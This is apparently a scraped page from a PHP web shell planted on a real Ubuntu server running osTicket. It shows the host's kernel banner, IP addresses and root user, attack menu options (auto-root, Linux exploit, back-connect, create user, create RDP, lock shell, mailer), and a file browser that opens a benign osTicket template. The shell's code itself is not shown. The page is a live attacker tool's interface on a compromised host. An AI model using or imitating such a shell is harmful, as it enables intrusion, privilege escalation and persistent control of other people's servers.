Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
include /
upgrader /
[ HOME SHELL ]
Name
Size
Permission
Action
streams
[ DIR ]
drwxr-xr-x
aborted.inc.php
2.13
KB
-rw-r--r--
done.inc.php
2.98
KB
-rw-r--r--
prereq.inc.php
3.5
KB
-rw-r--r--
rename.inc.php
1.98
KB
-rw-r--r--
upgrade.inc.php
3.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aborted.inc.php
<?php if(!defined('OSTSCPINC') || !$thisstaff || !$thisstaff->isAdmin()) die('Access Denied'); ?> <div id="upgrader"> <div id="main"> <h1 style="color:#FF7700;"><?php echo __('Upgrade Aborted!');?></h1> <div id="intro"> <p><strong><?php echo __('Upgrade aborted due to errors. Any errors at this stage are fatal.');?></strong></p> <p><?php echo sprintf(__('Please note the error(s), if any, when %1$s seeking help %2$s.'),'<a target="_blank" href="https://osticket.com/support/">','</a>');?><p> <?php if($upgrader && ($errors=$upgrader->getErrors())) { if($errors['err']) echo sprintf('<b><font color="red">%s</font></b>',$errors['err']); echo '<ul class="error">'; unset($errors['err']); foreach($errors as $k => $error) echo sprintf('<li>%s</li>',$error); echo '</ul>'; } else { echo '<b><font color="red">'.__('Internal error occurred').' - '.__('Get technical help!').'</font></b>'; } ?> <p><b><?php echo sprintf(__('For details - please view %s or check your email.'), sprintf('<a href="logs.php">%s</a>', __('System Logs')));?></b></p> <br> <p><?php echo sprintf(__('Please refer to the %1$s Upgrade Guide %2$s for more information.'), '<a target="_blank" href="https://docs.osticket.com/en/latest/Getting%20Started/Upgrade%20and%20Migration.html">', '</a>');?></p> </div> <p><strong><?php echo __('Need Help?');?></strong> <?php echo sprintf(__('We provide %1$s professional upgrade services %2$s and commercial support.'), '<a target="_blank" href="https://osticket.com/support/"><u>','</u></a>'); echo sprintf(__('%1$s Contact us %2$s today for <u>expedited</u> help.'), '<a target="_blank" href="https://osticket.com/contact-us/">','</a>');?></p> </div> <div class="sidebar"> <h3><?php echo __('What to do?');?></h3> <p><?php echo sprintf(__('Restore your previous version from backup and try again or %1$s seek help %2$s.'), '<a target="_blank" href="https://osticket.com/support/">','</a>');?></p> </div> <div class="clear"></div> </div>
Close